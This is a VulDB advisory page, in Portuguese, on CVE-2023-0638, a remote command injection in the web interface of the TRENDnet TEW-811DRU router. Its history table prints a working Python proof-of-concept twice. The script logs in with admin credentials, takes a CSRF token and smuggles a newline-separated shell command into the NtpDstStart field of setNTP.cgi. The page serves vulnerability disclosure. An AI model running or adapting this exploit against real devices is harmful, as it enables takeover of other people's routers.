TRENDnet TEW-811DRU 1.0.10.0 Web Interface direitos alargados

Uma vulnerabilidade foi encontrada em TRENDnet TEW-811DRU 1.0.10.0. Foi classificada como crítico. Afectado é uma função desconhecida do componente Web Interface. A manipulação com uma entrada desconhecida leva a direitos alargados. Usar a CWE para declarar o problema leva à CWE-77. A vulnerabilidade é identificada como CVE-2023-0638. O ataque pode ser feito a partir da rede. Não há detalhes técnicos disponíveis. Além disso, há uma exploração disponível. A exploração foi divulgada ao público e pode ser utilizada. Esta vulnerabilidade é atribuída a T1202 pelo projecto MITRE ATT&CK. É declarado como proof-of-concept. É possível descarregar a exploração em vuldb.com. Como 0 dia, o preço estimado do subsolo foi de cerca de $0-$5k.

Campo	02/02/2023 09h09	02/02/2023 09h10	01/03/2023 16h39
vendor	TRENDnet	TRENDnet	TRENDnet
name	TEW-811DRU	TEW-811DRU	TEW-811DRU
version	1.0.10.0	1.0.10.0	1.0.10.0
component	Web Interface	Web Interface	Web Interface
cwe	77 (direitos alargados)	77 (direitos alargados)	77 (direitos alargados)
risk	2	2	2
cvss3_vuldb_av	N	N	N
cvss3_vuldb_ac	L	L	L
cvss3_vuldb_pr	H	H	H
cvss3_vuldb_ui	N	N	N
cvss3_vuldb_s	U	U	U
cvss3_vuldb_c	H	H	H
cvss3_vuldb_i	H	H	H
cvss3_vuldb_a	H	H	H
cvss3_vuldb_e	P	P	P
cvss3_vuldb_rc	R	R	R
availability	1	1	1
publicity	1	1	1
cve	CVE-2023-0638	CVE-2023-0638	CVE-2023-0638
responsible	VulDB	VulDB	VulDB
date	1675292400 (02/02/2023)	1675292400 (02/02/2023)	1675292400 (02/02/2023)
cvss2_vuldb_av	N	N	N
cvss2_vuldb_ac	L	L	L
cvss2_vuldb_au	M	M	M
cvss2_vuldb_ci	C	C	C
cvss2_vuldb_ii	C	C	C
cvss2_vuldb_ai	C	C	C
cvss2_vuldb_e	POC	POC	POC
cvss2_vuldb_rc	UR	UR	UR
cvss2_vuldb_rl	ND	ND	ND
cvss3_vuldb_rl	X	X	X
cvss2_vuldb_basescore	8.3	8.3	8.3
cvss2_vuldb_tempscore	7.1	7.1	7.1
cvss3_vuldb_basescore	7.2	7.2	7.2
cvss3_vuldb_tempscore	6.5	6.5	6.5
cvss3_meta_basescore	7.2	7.2	7.2
cvss3_meta_tempscore	6.5	6.5	6.5
price_0day	$0-$5k	$0-$5k	$0-$5k
language		Python	Python
sourcecode		import requests,socket import re import time from urllib.parse import urlencode username = 'admin' password = 'ZYWN7T47' device_web_ip = '192.168.10.1' ping_target_ip = '192.168.10.102' request = {'HEAD': {'Host': '{}'.format(device_web_ip), 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Accept-Encoding': 'gzip, deflate', 'Content-Type': 'application/x-www-form-urlencoded', 'Content-Length': '555', 'Origin': 'http://0.0.0.0:8081', #'Authorization': 'Basic YWRtaW46WllXTjdUNDc=', 'Connection': 'keep-alive', 'Referer': 'http://0.0.0.0:8081/adm/time.asp', 'Cookie': 'expandable=5c', 'Upgrade-Insecure-Requests': '1'}, 'PARAM': {'token': 'fW092VEZZPulJJfC1WkY', 'DSTenable': 'on', 'NtpDstEnable': 1, 'NtpDstOffset': -7200, 'NtpDstStart': 'abcd\nping -c 1 {}\n'.format(ping_target_ip), 'tz_daylight_start_day_select': 1, 'tz_daylight_start_time_select': 2, 'NtpDstEnd': 100102, 'tz_daylight_end_month_select': 384968387, 'tz_daylight_end_day_select': 1, 'tz_daylight_end_time_select': 2, 'enableNTP': 1, 'ntp_server': 1, 'NTPServerIP': 'pool.ntp.org', 'time_zone': 'UCT_-11', 'timer_interval': 16776915, 'manual_year_select': 2012, 'manual_month_select': 'abcd', 'manual_day_select': 'abcd', 'manual_min_select': -38, 'manual_sec_select': "abcd", 'timeTag': 'dummy', 'range.func': '/.../.../.../.../.../.../.../.../.../.../', 'DNSServerGuest': ''}, 'ATTR': {'URL': 'http://{}/setNTP.cgi'.format(device_web_ip), 'METHOD': 'POST', 'VERSION': 'HTTP/1.1'} } headers = request['HEAD'] params = request['PARAM'] method = request['ATTR']['METHOD'] url = request['ATTR']['URL'] login_header = {'Host': '0.0.0.0:8081', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0', 'Accept': '/', 'Accept-Language': 'en-US,en;q=0.5', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Referer': 'http://0.0.0.0:8081/login.asp', 'Cookie': 'expandable=4c'} login = 'http://{}/login.cgi?langSelection=EN'.format(device_web_ip) probe = 'http://{}/wizard/wizard.asp'.format(device_web_ip) loop = 3 r = None while loop>0: try: loop -= 1 r = requests.get(url=login,headers=login_header,auth=(username,password),timeout=5) if r.status_code != 200: continue r = requests.get(url=probe,headers=headers,auth=(username,password),timeout=5) pat = r'name="token" value="(.?)"' token_value = re.findall(pat,r.text) if len(token_value)>0: params['token'] = token_value[0] print('new_token:{}'.format(token_value[0])) break except Exception as e: time.sleep((3-loop)3) print('error:{}'.format(e)) try: r = requests.request(method=method,url=url,headers=headers,auth=(username,password),data=urlencode(params),verify=False,timeout=5) except: pass	import requests,socket import re import time from urllib.parse import urlencode username = 'admin' password = 'ZYWN7T47' device_web_ip = '192.168.10.1' ping_target_ip = '192.168.10.102' request = {'HEAD': {'Host': '{}'.format(device_web_ip), 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0', 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Accept-Encoding': 'gzip, deflate', 'Content-Type': 'application/x-www-form-urlencoded', 'Content-Length': '555', 'Origin': 'http://0.0.0.0:8081', #'Authorization': 'Basic YWRtaW46WllXTjdUNDc=', 'Connection': 'keep-alive', 'Referer': 'http://0.0.0.0:8081/adm/time.asp', 'Cookie': 'expandable=5c', 'Upgrade-Insecure-Requests': '1'}, 'PARAM': {'token': 'fW092VEZZPulJJfC1WkY', 'DSTenable': 'on', 'NtpDstEnable': 1, 'NtpDstOffset': -7200, 'NtpDstStart': 'abcd\nping -c 1 {}\n'.format(ping_target_ip), 'tz_daylight_start_day_select': 1, 'tz_daylight_start_time_select': 2, 'NtpDstEnd': 100102, 'tz_daylight_end_month_select': 384968387, 'tz_daylight_end_day_select': 1, 'tz_daylight_end_time_select': 2, 'enableNTP': 1, 'ntp_server': 1, 'NTPServerIP': 'pool.ntp.org', 'time_zone': 'UCT_-11', 'timer_interval': 16776915, 'manual_year_select': 2012, 'manual_month_select': 'abcd', 'manual_day_select': 'abcd', 'manual_min_select': -38, 'manual_sec_select': "abcd", 'timeTag': 'dummy', 'range.func': '/.../.../.../.../.../.../.../.../.../.../', 'DNSServerGuest': ''}, 'ATTR': {'URL': 'http://{}/setNTP.cgi'.format(device_web_ip), 'METHOD': 'POST', 'VERSION': 'HTTP/1.1'} } headers = request['HEAD'] params = request['PARAM'] method = request['ATTR']['METHOD'] url = request['ATTR']['URL'] login_header = {'Host': '0.0.0.0:8081', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0', 'Accept': '/', 'Accept-Language': 'en-US,en;q=0.5', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Referer': 'http://0.0.0.0:8081/login.asp', 'Cookie': 'expandable=4c'} login = 'http://{}/login.cgi?langSelection=EN'.format(device_web_ip) probe = 'http://{}/wizard/wizard.asp'.format(device_web_ip) loop = 3 r = None while loop>0: try: loop -= 1 r = requests.get(url=login,headers=login_header,auth=(username,password),timeout=5) if r.status_code != 200: continue r = requests.get(url=probe,headers=headers,auth=(username,password),timeout=5) pat = r'name="token" value="(.?)"' token_value = re.findall(pat,r.text) if len(token_value)>0: params['token'] = token_value[0] print('new_token:{}'.format(token_value[0])) break except Exception as e: time.sleep((3-loop)3) print('error:{}'.format(e)) try: r = requests.request(method=method,url=url,headers=headers,auth=(username,password),data=urlencode(params),verify=False,timeout=5) except: pass
cve_assigned			1675292400 (02/02/2023)
cve_nvd_summary			A vulnerability has been found in TRENDnet TEW-811DRU 1.0.10.0 and classified as critical. This vulnerability affects unknown code of the component Web Interface. The manipulation leads to command injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-220018 is the identifier assigned to this vulnerability.

◂ Voltar Visão Geral Próximo ▸

Are you interested in using VulDB?

Download the whitepaper to learn more about our service!